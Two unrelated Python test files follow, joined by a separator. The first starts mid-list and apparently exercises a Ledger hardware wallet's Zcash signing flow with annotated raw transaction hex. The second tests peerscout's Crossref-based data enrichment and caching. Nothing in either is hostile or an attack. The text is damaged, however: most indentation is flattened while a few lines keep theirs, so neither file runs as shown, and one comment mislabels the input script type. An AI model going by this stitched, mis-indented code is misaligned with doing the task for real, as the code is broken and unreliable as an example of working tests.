test_zcash_tx_sign_restart_prefix_cmds, test_zcash_tx_to_sign_finalized
]
utxo_single = bytes.fromhex(
# https://sochain.com/api/v2/tx/ZEC/ec9033381c1cc53ada837ef9981c03ead1c7c41700ff3a954389cfaddc949256
# Version @offset 0
"04000080"
# versionGroupId @offset 4
"85202f89"
# Input count @offset 8
"01"
# Input prevout hash @offset 9
"53685b8809efc50dd7d5cb0906b307a1b8aa5157baa5fc1bd6fe2d0344dd193a"
# Input prevout idx @offset 41
"00000000"
# Input script length @offset 45
"6b"
# Input script (107 bytes) @ offset 46
"483045022100ca0be9f37a4975432a52bb65b25e483f6f93d577955290bb7fb0"
"060a93bfc92002203e0627dff004d3c72a957dc9f8e4e0e696e69d125e4d8e27"
"5d119001924d3b48012103b243171fae5516d1dc15f9178cfcc5fdc67b0a8830"
"55c117b01ba8af29b953f6"
    # Input sequence @offset 153
    "ffffffff"
    # Output count @offset 157
    "01"
    # Output #1 value @offset 158
    "4072070000000000"
    # Output #1 script length @offset 166
    "19"
    # Output #1 script (25 bytes) @offset 167
    "76a91449964a736f3713d64283fd0018626ba50091c7e988ac"
    # Locktime @offset 192
    "00000000"
    # Extra payload (size of everything remaining, specific to btc app inner protocol) @offset 196
    "0F"
    # Expiry @offset 197
    "00000000"
    # valueBalance @offset 201
    "0000000000000000"
    # vShieldedSpend @offset 209
    "00"
    # vShieldedOutput @offset 210
    "00"
    # vJoinSplit @offset 211
    "00"
)
utxos = [
# Considered a segwit tx - segwit flags couldn't be extracted from raw
# Get Trusted Input APDUs as they are not supposed to be sent w/ these APDUs.
bytes.fromhex(
# Version @offset 0
"04000080"
# versionGroupId @offset 4
"85202f89"
# Input count @offset 8
"01"
# Input prevout hash @offset 9
"edc69b8179fd7c6a11a8a1ba5d17017df5e09296c3a1acdada0d94e199f68857"
# Input prevout idx @offset 41
"01000000"
# Input script length @offset 45
"6b"
# Input script (107 bytes) @ offset 46
"483045022100e8043cd498714122a78b6ecbf8ced1f74d1c65093c5e2649336d"
"fa248aea9ccf022023b13e575956354521301c91ed0fe7072d295aa232215e74"
"e50d01a73b005dac01210201e1c9d8186c093d116ec619b7dad2b7ff0e7dd16f"
"42d458da1100831dc4ff72"
# Input sequence @offset 153
"ffffff00"
# Output count @offset 157
"02"
        # Output #1 value @offset 158
"a086010000000000"
        # Output #1 script length @offset 166
"19"
# Output #1 script (25 bytes) @offset 167
"76a914fa9737ab9964860ca0c3e9ad6c7eb3bc9c8f6fb588ac"
# Output #2 value @offset 192
"4d94910000000000" # 9 540 685 units of ZEC smallest currency available
# Output #2 script length @offset 200
"19"
# Output #2 script (25 bytes) @offset 201
"76a914b714c60805804d86eb72a38c65ba8370582d09e888ac"
# Locktime @offset 226
"00000000"
# Extra payload (size of everything remaining, specific to btc app inner protocol @offset 230
"0F"
# Expiry @offset 231
"00000000"
# valueBalance @offset 235
"0000000000000000"
# vShieldedSpend @offset 243
"00"
# vShieldedOutput @offset 244
"00"
# vJoinSplit @offset 245
"00"
)
]
tx_to_sign = bytes.fromhex(
# version @offset 0
"04000080"
# Some Zcash flags (?) @offset 4
"85202f89"
# Input count @offset 8
"01"
# Input's prevout hash @offset 9
"d35f0793da27a5eacfe984c73b1907af4b50f3aa3794ba1bb555b9233addf33f"
# Prevout idx @offset 41
"01000000"
# input sequence @offset 45
"ffffff00"
# Output count @offset 49
"02"
# Output #1 value @offset 50
"40420f0000000000" # 1 000 000 units of available balance spent
# Output #1 script (26 bytes) @offset 58
"1976a91490360f7a0b0e50d5dd0c924fc1d6e7adb8519c9388ac"
# Output #2 value @offset 84
"2b51820000000000"
    # Output #2 script (26 bytes) @offset 92
"1976a91490360f7a0b0e50d5dd0c924fc1d6e7adb8519c9388ac"
# Locktime @offset 118
"5eb3f840"
)
change_path = bytes.fromhex("058000002c80000085800000000000000100000003") # 44'/133'/0'/1/3
output_paths = [
bytes.fromhex("058000002c80000085800000000000000100000001"), # 44'/133'/0'/1/1
bytes.fromhex("058000002c80000085800000000000000000000004") # 44'/133'/0'/0/4
]
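# BIP32 path serialization reminder: each blob above is <depth (1 byte)>
# followed by `depth` 4-byte big-endian indexes; hardened indexes carry the
# 0x80000000 bit, e.g. 0x8000002c == 44'.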
@pytest.mark.zcash
class TestLedgerjsZcashTx(BaseTestBtc):
def _send_raw_apdus(self, apdus: List[LedgerjsApdu], device: DeviceAppBtc):
# Send the Get Version APDUs
for apdu in apdus:
try:
for command in apdu.commands:
response = device.sendRawApdu(bytes.fromhex(command))
if apdu.expected_resp is not None:
self.check_raw_apdu_resp(apdu.expected_resp, response)
elif apdu.check_sig_format is not None and apdu.check_sig_format == True:
self.check_signature(response) # Only format is checked
except CommException as error:
if apdu.expected_sw is not None and error.sw.hex() == apdu.expected_sw:
continue
raise error
@pytest.mark.skip(reason="Hardcoded TrustedInput can't be replayed on a different device than the one that generated it")
@pytest.mark.manual
@pytest.mark.parametrize('test_data', ledgerjs_test_data)
def test_replay_zcash_test(self, test_data: List[LedgerjsApdu]) -> None:
"""
Replay of raw apdus from @gre.
First time an output is presented for validation, it must be rejected by user
Then tx will be restarted and on 2nd presentation of outputs they have to be
accepted.
"""
apdus = test_data
btc = DeviceAppBtc()
self._send_raw_apdus(apdus, btc)
@pytest.mark.manual
def test_get_single_trusted_input(self) -> None:
btc = DeviceAppBtc()
# 1. Get Trusted Input
print("\n--* Get Trusted Input - from utxos")
input_datum = bytes.fromhex("00000000") + utxo_single
utxo_chunk_len = [
4 + 5 + 4, # len(prevout_index (BE)||version||input_count||versionGroupId)
37, # len(prevout_hash||prevout_index||len(scriptSig))
-1, # len(scriptSig, from last byte of previous chunk) + len(input_sequence)
1, # len(output_count)
34, # len(output_value #1||len(scriptPubkey #1)||scriptPubkey #1)
4 + 1, # len(locktime || extra_data)
4+16+1+1+1 # len(Expiry||valueBalance||vShieldedSpend||vShieldedOutput||vJoinSplit)
]
trusted_input = btc.getTrustedInput(data=input_datum, chunks_len=utxo_chunk_len)
self.check_trusted_input(
trusted_input,
out_index=bytes.fromhex("00000000"),
out_amount=bytes.fromhex("4072070000000000"),
out_hash=bytes.fromhex("569294dcadcf8943953aff0017c4c7d1ea031c98f97e83da3ac51c1c383390ec")
)
print(" OK")
@pytest.mark.manual
def test_replay_zcash_test2(self) -> None:
"""
Adapted version to work around some hw limitations
"""
# Send the Get Version raw apdus
apdus = test_zcash_prefix_cmds
btc = DeviceAppBtc()
self._send_raw_apdus(apdus, btc)
# 1. Get Trusted Input
print("\n--* Get Trusted Input - from utxos")
output_indexes = [
tx_to_sign[41+4-1:41-1:-1], # out_index in tx_to_sign input must be passed BE as prefix to utxo tx
]
input_data = [out_idx + utxo for out_idx, utxo in zip(output_indexes, utxos)]
utxos_chunks_len = [
[ # utxo #1
4+5+4, # len(prevout_index (BE)||version||input_count||versionGroupId)
37, # len(prevout_hash||prevout_index||len(scriptSig))
-1, # len(scriptSig, from last byte of previous chunk) + len(input_sequence)
1, # len(output_count)
34, # len(output_value #1||len(scriptPubkey #1)||scriptPubkey #1)
34, # len(output_value #2||len(scriptPubkey #2)||scriptPubkey #2)
4 + 1, # len(locktime)
4 + 16 + 1 + 1 + 1 # len(Expiry||valueBalance||vShieldedSpend||vShieldedOutput||vJoinSplit)
]
]
trusted_inputs = [
btc.getTrustedInput(
data=input_datum,
chunks_len=chunks_len
)
for (input_datum, chunks_len) in zip(input_data, utxos_chunks_len)
]
print(" OK")
out_amounts = [utxos[0][192:192+8]] # UTXO tx's 2nd output's value
prevout_hashes = [tx_to_sign[9:9+32]]
for trusted_input, out_idx, out_amount, prevout_hash in zip(
trusted_inputs, output_indexes, out_amounts, prevout_hashes
):
self.check_trusted_input(
trusted_input,
out_index=out_idx[::-1], # LE for comparison w/ out_idx in trusted_input
out_amount=out_amount, # utxo output #1 is requested in tx to sign input
out_hash=prevout_hash # prevout hash in tx to sign
)
# 2.0 Get public keys for output paths & compute their hashes
print("\n--* Get Wallet Public Key - for each tx output path")
wpk_responses = [btc.getWalletPublicKey(output_path) for output_path in output_paths]
print(" OK")
pubkeys_data = [self.split_pubkey_data(data) for data in wpk_responses]
for pubkey in pubkeys_data:
print(pubkey)
# 2.1 Construct a pseudo-tx without input script, to be hashed 1st.
print("\n--* Untrusted Transaction Input Hash Start - Hash tx to sign first w/ all inputs having a null script length")
input_sequences = [tx_to_sign[45:45+4]]
ptx_to_hash_part1 = [tx_to_sign[:9]]
for trusted_input, input_sequence in zip(trusted_inputs, input_sequences):
ptx_to_hash_part1.extend([
bytes.fromhex("01"), # TrustedInput marker byte, triggers the TrustedInput's HMAC verification
bytes([len(trusted_input)]),
trusted_input,
bytes.fromhex("00"), # Input script length = 0 (no sigScript)
input_sequence
])
ptx_to_hash_part1 = reduce(lambda x, y: x+y, ptx_to_hash_part1) # Get a single bytes object
ptx_to_hash_part1_chunks_len = [
9 # len(version||flags||input_count) - skip segwit version+flag bytes
]
for trusted_input in trusted_inputs:
ptx_to_hash_part1_chunks_len.extend([
1 + 1 + len(trusted_input) + 1, # len(trusted_input_marker||len(trusted_input)||trusted_input||len(scriptSig) == 0)
4 # len(input_sequence)
])
btc.untrustedTxInputHashStart(
p1="00",
p2="05", # Value used for Zcash
data=ptx_to_hash_part1,
chunks_len=ptx_to_hash_part1_chunks_len
)
print(" OK")
# 2.2 Finalize the input-centric-, pseudo-tx hash with the remainder of that tx
# 2.2.1 Start with change address path
print("\n--* Untrusted Transaction Input Hash Finalize Full - Handle change address")
ptx_to_hash_part2 = change_path
ptx_to_hash_part2_chunks_len = [len(ptx_to_hash_part2)]
btc.untrustedTxInputHashFinalize(
p1="ff", # to derive BIP 32 change address
data=ptx_to_hash_part2,
chunks_len=ptx_to_hash_part2_chunks_len
)
print(" OK")
# 2.2.2 Continue w/ tx to sign outputs & scripts
print("\n--* Untrusted Transaction Input Hash Finalize Full - Continue w/ hash of tx output")
ptx_to_hash_part3 = tx_to_sign[49:118] # output_count||repeated(output_amount||scriptPubkey)
ptx_to_hash_part3_chunks_len = [len(ptx_to_hash_part3)]
response = btc.untrustedTxInputHashFinalize(
p1="00",
data=ptx_to_hash_part3,
chunks_len=ptx_to_hash_part3_chunks_len
)
assert response == bytes.fromhex("0000")
print(" OK")
# We're done w/ the hashing of the pseudo-tx with all inputs w/o scriptSig.
# 2.2.3. Zcash-specific: "When using Overwinter/Sapling, UNTRUSTED HASH SIGN is
# called with an empty authorization and nExpiryHeight following the first
# UNTRUSTED HASH TRANSACTION INPUT FINALIZE FULL"
print("\n--* Untrusted Has Sign - with empty Auth & nExpiryHeight")
branch_id_data = [
bytes.fromhex(
"00" # Number of derivations (None)
"00" # Empty validation code
),
tx_to_sign[-4:], # locktime
bytes.fromhex("01"), # SigHashType - always 01
bytes.fromhex("00000000") # Empty nExpiryHeight
]
response = btc.untrustedHashSign(
data = reduce(lambda x, y: x+y, branch_id_data)
)
# 3. Sign each input individually. Because inputs are segwit, hash each input with its scriptSig
# and sequence individually, each in a pseudo-tx w/o output_count, outputs nor locktime.
print("\n--* Untrusted Transaction Input Hash Start, step 2 - Hash again each input individually (only 1)")
# Inputs are P2WPKH, so use 0x1976a914{20-byte-pubkey-hash}88ac from utxo as scriptSig in this step.
#
# From btc.asc: "The input scripts shall be prepared by the host for the transaction signing process as
# per bitcoin rules : the current input script being signed shall be the previous output script (or the
# redeeming script when consuming a P2SH output, or the scriptCode when consuming a BIP 143 output), and
# other input script shall be null."
        input_scripts = [utxos[0][200:200 + utxos[0][200] + 1]]  # output #2 scriptPubkey incl. its length byte 0x19 @offset 200
# input_scripts = [tx_to_sign[45:45 + tx_to_sign[45] + 1]]
# input_scripts = [bytes.fromhex("1976a914") + pubkey.pubkey_hash + bytes.fromhex("88ac")
# for pubkey in pubkeys_data]
ptx_for_inputs = [
[ tx_to_sign[:8], # Tx version||zcash flags
bytes.fromhex("0101"), # Input_count||TrustedInput marker byte
bytes([len(trusted_input)]),
trusted_input,
input_script,
input_sequence
] for trusted_input, input_script, input_sequence in zip(trusted_inputs, input_scripts, input_sequences)
]
ptx_chunks_lengths = [
[
9, # len(version||zcash flags||input_count) - segwit flag+version not sent
1 + 1 + len(trusted_input) + 1, # len(trusted_input_marker||len(trusted_input)||trusted_input||scriptSig_len == 0x19)
-1 # get len(scripSig) from last byte of previous chunk + len(input_sequence)
] for trusted_input in trusted_inputs
]
# Hash & sign each input individually
for ptx_for_input, ptx_chunks_len, output_path in zip(ptx_for_inputs, ptx_chunks_lengths, output_paths):
# 3.1 Send pseudo-tx w/ sigScript
btc.untrustedTxInputHashStart(
p1="00",
p2="80", # to continue previously started tx hash, be it BTc or other BTC-like coin
data=reduce(lambda x,y: x+y, ptx_for_input),
chunks_len=ptx_chunks_len
)
print(" Final hash OK")
# 3.2 Sign tx at last. Param is:
# Num_derivs||Dest output path||RFU (0x00)||tx locktime||sigHashType(always 0x01)||Branch_id for overwinter (4B)
print("\n--* Untrusted Transaction Hash Sign")
tx_to_sign_data = output_path \
+ bytes.fromhex("00") \
+ tx_to_sign[-4:] \
+ bytes.fromhex("01") \
+ bytes.fromhex("00000000")
response = btc.untrustedHashSign(
data = tx_to_sign_data
)
self.check_signature(response) # Check sig format only
# self.check_signature(response, expected_der_sig) # Can't test sig value as it depends on signing device seed
print(" Signature OK\n")
|
import logging
import json
from typing import Dict
from unittest.mock import patch, Mock, ANY
from configparser import ConfigParser
from datetime import datetime, timedelta
import pytest
from peerscout.utils.config import dict_to_config
from peerscout.shared.database import populated_in_memory_database
from peerscout.preprocessing import enrichData as enrich_data_module
from peerscout.preprocessing.enrichData import (
extract_manuscript,
contains_author_with_orcid,
create_str_cache,
enrich_and_update_person_list,
get_crossref_works_by_orcid_url,
get_crossref_works_by_full_name_url,
parse_int_list,
decorate_get_request_handler,
get_persons_to_enrich,
main,
DEFAULT_MAX_WORKERS
)
LOGGER = logging.getLogger(__name__)
URL_1 = 'test://dummy.url'
URL_2 = 'test://dummy.url2'
UNICODE_URL_1 = 'test://dummy.url?\xe4'
TITLE1 = 'Title 1'
ABSTRACT1 = 'Abstract 1'
MANUSCRIPT_TYPE1 = 'Manuscript Type 1'
# Schema field names
PERSON_ID = 'person_id'
MANUSCRIPT_ID = 'manuscript_id'
DOI = 'doi'
PERSON_ID_1 = 'person1'
PERSON_ID_2 = 'person2'
FIRST_NAME_1 = 'Jon'
LAST_NAME_1 = 'Smith'
PERSON_1 = {
PERSON_ID: PERSON_ID_1,
'first_name': FIRST_NAME_1,
'last_name': LAST_NAME_1,
'is_early_career_researcher': False
}
ECR_1 = {
**PERSON_1,
'is_early_career_researcher': True
}
ORCID_1 = 'orcid1'
ORCID_MEMBERSHIP_1 = {
PERSON_ID: PERSON_ID_1,
'member_type': 'ORCID',
'member_id': ORCID_1
}
DOI_1 = 'doi1'
DOI_2 = 'doi2'
MANUSCRIPT_ID_1 = 'manuscript1'
ROLE_1 = 'role1'
ROLE_2 = 'role2'
EMPTY_DATASET = {}
def setup_module():
logging.root.handlers = []
logging.basicConfig(level=logging.DEBUG)
def get_crossref_response(items):
return json.dumps({
'message': {
'items': items
}
})
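# e.g. get_crossref_response([{'DOI': 'doi1'}]) returns
# '{"message": {"items": [{"DOI": "doi1"}]}}', mirroring the envelope of the
# Crossref works API responses mocked in the tests below.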
@pytest.fixture(name='mock_f')
def _mock_f():
mock_f = Mock()
mock_f.return_value = 'mock_f return_value'
return mock_f
class TestCreateStrCache:
@pytest.fixture
def now(self):
with patch.object(enrich_data_module, 'get_current_time') as now:
yield now
@pytest.fixture
def getmtime(self):
with patch('os.path.getmtime') as getmtime:
yield getmtime
def test_should_call_function_and_return_value_if_not_in_cache(self, tmpdir, mock_f: Mock):
cached_f = create_str_cache(mock_f, str(tmpdir))
assert cached_f(URL_1) == mock_f.return_value
mock_f.assert_called_with(URL_1)
def test_should_call_function_with_unicode(self, tmpdir, mock_f: Mock):
cached_f = create_str_cache(mock_f, str(tmpdir))
assert cached_f(UNICODE_URL_1) == mock_f.return_value
mock_f.assert_called_with(UNICODE_URL_1)
def test_should_call_function_only_once_called_with_the_same_parameter(
self, tmpdir, mock_f: Mock):
cached_f = create_str_cache(mock_f, str(tmpdir))
cached_f(URL_1)
assert cached_f(URL_1) == mock_f.return_value
assert mock_f.call_count == 1
def test_should_call_function_multiple_times_if_called_with_the_different_parameter(
self, tmpdir, mock_f: Mock):
cached_f = create_str_cache(mock_f, str(tmpdir))
cached_f(URL_1)
assert cached_f(URL_2) == mock_f.return_value
assert mock_f.call_count == 2
mock_f.assert_called_with(URL_2)
def test_should_call_function_twice_if_cache_has_expired(
self, tmpdir, mock_f: Mock, now: Mock, getmtime: Mock):
now.return_value = datetime(2018, 1, 1)
getmtime.return_value = now.return_value.timestamp()
LOGGER.info('str(tmpdir): %s', str(tmpdir))
cached_f = create_str_cache(mock_f, str(tmpdir), expire_after_secs=10)
cached_f(URL_1)
now.return_value = now.return_value + timedelta(seconds=10)
assert cached_f(URL_1) == mock_f.return_value
assert mock_f.call_count == 2
def test_should_call_function_once_if_cache_has_not_yet_expired(
self, tmpdir, mock_f: Mock, now: Mock, getmtime: Mock):
now.return_value = datetime(2018, 1, 1)
getmtime.return_value = now.return_value.timestamp()
cached_f = create_str_cache(mock_f, str(tmpdir), expire_after_secs=10)
cached_f(URL_1)
now.return_value = now.return_value + timedelta(seconds=9)
assert cached_f(URL_1) == mock_f.return_value
assert mock_f.call_count == 1
class TestExtractManuscript:
def test_should_extract_title_if_present(self):
result = extract_manuscript({
'title': [TITLE1]
})
assert result.get('title') == TITLE1
def test_should_extract_abstract_if_present(self):
result = extract_manuscript({
'abstract': ABSTRACT1
})
assert result.get('abstract') == ABSTRACT1
def test_should_return_none_abstract_if_not_present(self):
result = extract_manuscript({})
assert result.get('abstract') is None
def test_should_extract_type_if_present(self):
result = extract_manuscript({
'type': MANUSCRIPT_TYPE1
})
assert result.get('manuscript_type') == MANUSCRIPT_TYPE1
def MapRequestHandler(response_by_url_map: Dict[str, str]):
    """Return a get_request_handler that serves canned responses from a url -> response-text map."""
def get_request_handler(url):
response_text = response_by_url_map.get(url)
if not response_text:
raise RuntimeError('url not configured: {}'.format(url))
return response_text
return get_request_handler
class TestContainsAuthorWithOrcid:
def test_should_false_if_item_has_no_authors(self):
assert not contains_author_with_orcid({}, ORCID_1)
def test_should_false_if_author_does_not_have_orcid(self):
assert not contains_author_with_orcid({
'author': {}
}, ORCID_1)
def test_should_false_if_orcid_does_not_match(self):
assert not contains_author_with_orcid({
'author': [{'ORCID': 'other'}]
}, ORCID_1)
def test_should_true_if_orcid_matches(self):
assert contains_author_with_orcid({
'author': [{'ORCID': ORCID_1}]
}, ORCID_1)
class TestGetPersonsToEnrich:
def test_should_raise_error_if_no_filter_option_specified(self):
with populated_in_memory_database(EMPTY_DATASET) as db:
with pytest.raises(AssertionError):
get_persons_to_enrich(db)
def test_should_include_ecr_without_orcid_membership(self):
dataset = {
'person': [ECR_1]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_early_career_researchers=True)
assert {p[PERSON_ID] for p in person_list} == {ECR_1[PERSON_ID]}
assert {p.get('ORCID') for p in person_list} == {None}
def test_should_include_ecr_with_orcid_membership(self):
dataset = {
'person': [ECR_1],
'person_membership': [ORCID_MEMBERSHIP_1]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_early_career_researchers=True)
assert {p[PERSON_ID] for p in person_list} == {ECR_1[PERSON_ID]}
LOGGER.debug('person_list: %s', person_list)
assert {p.get('ORCID') for p in person_list} == {ORCID_1}
def test_should_include_person_by_role_without_orcid_membership(self):
dataset = {
'person': [PERSON_1],
'person_role': [{PERSON_ID: PERSON_ID_1, 'role': ROLE_1}]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_roles=[ROLE_1])
assert {p[PERSON_ID] for p in person_list} == {PERSON_ID_1}
LOGGER.debug('person_list: %s', person_list)
assert {p.get('ORCID') for p in person_list} == {None}
def test_should_include_person_by_role_with_orcid_membership(self):
dataset = {
'person': [PERSON_1],
'person_role': [{PERSON_ID: PERSON_ID_1, 'role': ROLE_1}],
'person_membership': [ORCID_MEMBERSHIP_1]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_roles=[ROLE_1])
assert {p[PERSON_ID] for p in person_list} == {PERSON_ID_1}
LOGGER.debug('person_list: %s', person_list)
assert {p.get('ORCID') for p in person_list} == {ORCID_1}
def test_should_not_include_person_with_different_role(self):
dataset = {
'person': [PERSON_1],
'person_role': [{PERSON_ID: PERSON_ID_1, 'role': ROLE_2}]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_roles=[ROLE_1])
assert {p[PERSON_ID] for p in person_list} == set()
def test_should_not_include_person_without_a_role(self):
dataset = {
'person': [PERSON_1]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_roles=[ROLE_1])
assert {p[PERSON_ID] for p in person_list} == set()
def test_should_include_person_by_role_once_with_multiple_matching_roles(self):
dataset = {
'person': [PERSON_1],
'person_role': [
{PERSON_ID: PERSON_ID_1, 'role': ROLE_1},
{PERSON_ID: PERSON_ID_1, 'role': ROLE_2}
]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(db, include_roles=[ROLE_1, ROLE_2])
assert [p[PERSON_ID] for p in person_list] == [PERSON_ID_1]
def test_should_include_person_by_ecr_and_role(self):
dataset = {
'person': [
{**PERSON_1, PERSON_ID: PERSON_ID_1},
{**ECR_1, PERSON_ID: PERSON_ID_2}
],
'person_role': [{PERSON_ID: PERSON_ID_1, 'role': ROLE_1}]
}
with populated_in_memory_database(dataset) as db:
person_list = get_persons_to_enrich(
db, include_early_career_researchers=True, include_roles=[ROLE_1]
)
assert {p[PERSON_ID] for p in person_list} == {PERSON_ID_1, PERSON_ID_2}
def _enrich_early_career_researchers(db, get_request_handler, max_workers=1):
person_list = get_persons_to_enrich(
db, include_early_career_researchers=True, include_roles=[]
)
enrich_and_update_person_list(
db, person_list, get_request_handler, max_workers=max_workers
)
class TestEnrichAndUpdatePersonList:
def test_should_not_fail_if_database_is_empty(self):
with populated_in_memory_database(EMPTY_DATASET) as db:
_enrich_early_career_researchers(db, MapRequestHandler({}))
def test_should_import_one_by_orcid(self):
response_by_url_map = {
get_crossref_works_by_orcid_url(ORCID_1): get_crossref_response([{
'DOI': DOI_1,
'author': [{
'ORCID': ORCID_1
}]
}])
}
dataset = {
'person': [ECR_1],
'person_membership': [ORCID_MEMBERSHIP_1]
}
with populated_in_memory_database(dataset) as db:
_enrich_early_career_researchers(db, MapRequestHandler(response_by_url_map))
manuscript_df = db.manuscript.read_frame().reset_index()
LOGGER.debug('manuscript_df:\n%s', manuscript_df)
assert set(manuscript_df[DOI]) == {DOI_1}
manuscript_version_df = db.manuscript_version.read_frame().reset_index()
LOGGER.debug('manuscript_version_df:\n%s', manuscript_version_df)
assert set(manuscript_version_df['is_published']) == {True}
def test_should_import_one_by_full_name(self):
full_name = ' '.join([FIRST_NAME_1, LAST_NAME_1])
response_by_url_map = {
get_crossref_works_by_full_name_url(full_name): get_crossref_response([{
'DOI': DOI_1,
'author': [{
'given': FIRST_NAME_1,
'family': LAST_NAME_1
}]
}])
}
# not adding ORCID membership, this will trigger search by name instead
dataset = {
'person': [ECR_1]
}
with populated_in_memory_database(dataset) as db:
_enrich_early_career_researchers(db, MapRequestHandler(response_by_url_map))
manuscript_df = db.manuscript.read_frame().reset_index()
LOGGER.debug('manuscript_df:\n%s', manuscript_df)
assert set(manuscript_df[DOI]) == {DOI_1}
manuscript_version_df = db.manuscript_version.read_frame().reset_index()
LOGGER.debug('manuscript_version_df:\n%s', manuscript_version_df)
assert set(manuscript_version_df['is_published']) == {True}
def test_should_import_one_if_existing_doi_is_different(self):
response_by_url_map = {
get_crossref_works_by_orcid_url(ORCID_1): get_crossref_response([{
'DOI': DOI_2,
'author': [{
'ORCID': ORCID_1
}]
}])
}
dataset = {
'manuscript': [{
MANUSCRIPT_ID: MANUSCRIPT_ID_1,
DOI: DOI_1
}],
'person': [ECR_1],
'person_membership': [ORCID_MEMBERSHIP_1]
}
with populated_in_memory_database(dataset) as db:
_enrich_early_career_researchers(db, MapRequestHandler(response_by_url_map))
df = db.manuscript.read_frame().reset_index()
LOGGER.debug('df:\n%s', df)
assert set(df[DOI]) == {DOI_1, DOI_2}
def test_should_not_import_one_if_doi_already_exists(self):
response_by_url_map = {
get_crossref_works_by_orcid_url(ORCID_1): get_crossref_response([{
'DOI': DOI_1,
'author': [{
'ORCID': ORCID_1
}]
}])
}
dataset = {
'manuscript': [{
MANUSCRIPT_ID: MANUSCRIPT_ID_1,
DOI: DOI_1
}],
'person': [ECR_1],
'person_membership': [ORCID_MEMBERSHIP_1]
}
with populated_in_memory_database(dataset) as db:
_enrich_early_career_researchers(db, MapRequestHandler(response_by_url_map))
df = db.manuscript.read_frame().reset_index()
LOGGER.debug('df:\n%s', df)
assert list(df[DOI]) == [DOI_1]
def test_should_not_import_one_if_doi_already_exists_with_different_case(self):
doi_1_original = 'Doi 1'
doi_1_new = 'doi 1'
response_by_url_map = {
get_crossref_works_by_orcid_url(ORCID_1): get_crossref_response([{
'DOI': doi_1_new,
'author': [{
'ORCID': ORCID_1
}]
}])
}
dataset = {
'manuscript': [{
MANUSCRIPT_ID: MANUSCRIPT_ID_1,
DOI: doi_1_original
}],
'person': [ECR_1],
'person_membership': [ORCID_MEMBERSHIP_1]
}
with populated_in_memory_database(dataset) as db:
_enrich_early_career_researchers(db, MapRequestHandler(response_by_url_map))
df = db.manuscript.read_frame().reset_index()
LOGGER.debug('df:\n%s', df)
assert list(df[DOI]) == [doi_1_original]
class TestParseIntList:
def test_should_return_default_value_for_none(self):
assert parse_int_list(None, [1, 2, 3]) == [1, 2, 3]
def test_should_return_default_value_for_empty_string(self):
assert parse_int_list('', [1, 2, 3]) == [1, 2, 3]
def test_should_parse_multiple_values(self):
assert parse_int_list('100, 200, 300', [1, 2, 3]) == [100, 200, 300]
class TestDecorateGetRequestHandler:
@pytest.fixture(autouse=True)
def create_str_cache_mock(self):
with patch.object(enrich_data_module, 'create_str_cache') as create_str_cache_mock:
yield create_str_cache_mock
def test_should_call_through_with_decorators(self, mock_f):
app_config = ConfigParser()
decorated_get_request_handler = decorate_get_request_handler(
mock_f, app_config, cache_dir=None
)
assert decorated_get_request_handler(URL_1) == mock_f.return_value
        assert decorated_get_request_handler != mock_f  # pylint: disable=comparison-with-callable
def test_should_pass_expire_after_secs_to_cache(self, create_str_cache_mock, mock_f):
cache_dir = '.cache/dir'
decorate_get_request_handler(mock_f, dict_to_config(
{}), cache_dir=cache_dir, expire_after_secs=123)
create_str_cache_mock.assert_called_with(
ANY,
cache_dir=cache_dir,
suffix='.json',
expire_after_secs=123
)
class TestMain:
@pytest.fixture(name='get_app_config_mock', autouse=True)
def _get_app_config(self):
with patch.object(enrich_data_module, 'get_app_config') as get_app_config_mock:
get_app_config_mock.return_value = dict_to_config({})
yield get_app_config_mock
@pytest.fixture(name='decorate_get_request_handler_mock', autouse=True)
def _decorate_get_request_handler(self):
with patch.object(enrich_data_module, 'decorate_get_request_handler') \
as decorate_get_request_handler_mock:
yield decorate_get_request_handler_mock
@pytest.fixture(name='connect_managed_configured_database_mock', autouse=True)
def _connect_managed_configured_database(self):
with patch.object(enrich_data_module, 'connect_managed_configured_database') \
as connect_managed_configured_database_mock:
yield connect_managed_configured_database_mock
@pytest.fixture(name='get_persons_to_enrich_mock', autouse=True)
def _get_persons_to_enrich(self):
with patch.object(enrich_data_module, 'get_persons_to_enrich') \
as get_persons_to_enrich_mock:
yield get_persons_to_enrich_mock
@pytest.fixture(name='enrich_and_update_person_list_mock', autouse=True)
def _enrich_and_update_person_list(self):
with patch.object(enrich_data_module, 'enrich_and_update_person_list') \
as enrich_and_update_person_list_mock:
yield enrich_and_update_person_list_mock
def test_should_parse_expire_after_secs_and_pass_to_decorate_get_request_handler(
self, get_app_config_mock, decorate_get_request_handler_mock):
get_app_config_mock.return_value = dict_to_config({
'crossref': {
'expire_after_secs': '123'
}
})
main()
decorate_get_request_handler_mock.assert_called_with(
ANY,
ANY,
cache_dir=ANY,
expire_after_secs=123
)
def test_should_parse_false_early_career_researcher_and_pass_to_get_persons_to_enrich(
self, get_app_config_mock, get_persons_to_enrich_mock):
get_app_config_mock.return_value = dict_to_config({
'enrich-data': {
'include_early_career_researcher': 'false'
}
})
main()
get_persons_to_enrich_mock.assert_called_with(
ANY,
include_early_career_researchers=False,
include_roles=ANY
)
def test_should_parse_true_early_career_researcher_and_pass_to_get_persons_to_enrich(
self, get_app_config_mock, get_persons_to_enrich_mock):
get_app_config_mock.return_value = dict_to_config({
'enrich-data': {
'include_early_career_researcher': 'true'
}
})
main()
get_persons_to_enrich_mock.assert_called_with(
ANY,
include_early_career_researchers=True,
include_roles=ANY
)
def test_should_parse_roles_and_pass_to_get_persons_to_enrich(
self, get_app_config_mock, get_persons_to_enrich_mock):
get_app_config_mock.return_value = dict_to_config({
'enrich-data': {
'include_roles': '%s, %s' % (ROLE_1, ROLE_2)
}
})
main()
get_persons_to_enrich_mock.assert_called_with(
ANY,
include_early_career_researchers=ANY,
include_roles=[ROLE_1, ROLE_2]
)
def test_should_pass_correct_parameters_to_enrich_and_update_person_list(
self,
connect_managed_configured_database_mock,
get_persons_to_enrich_mock,
enrich_and_update_person_list_mock,
decorate_get_request_handler_mock):
main()
enrich_and_update_person_list_mock.assert_called_with(
connect_managed_configured_database_mock.return_value.__enter__.return_value,
get_persons_to_enrich_mock.return_value,
get_request_handler=decorate_get_request_handler_mock.return_value,
max_workers=DEFAULT_MAX_WORKERS
)
|
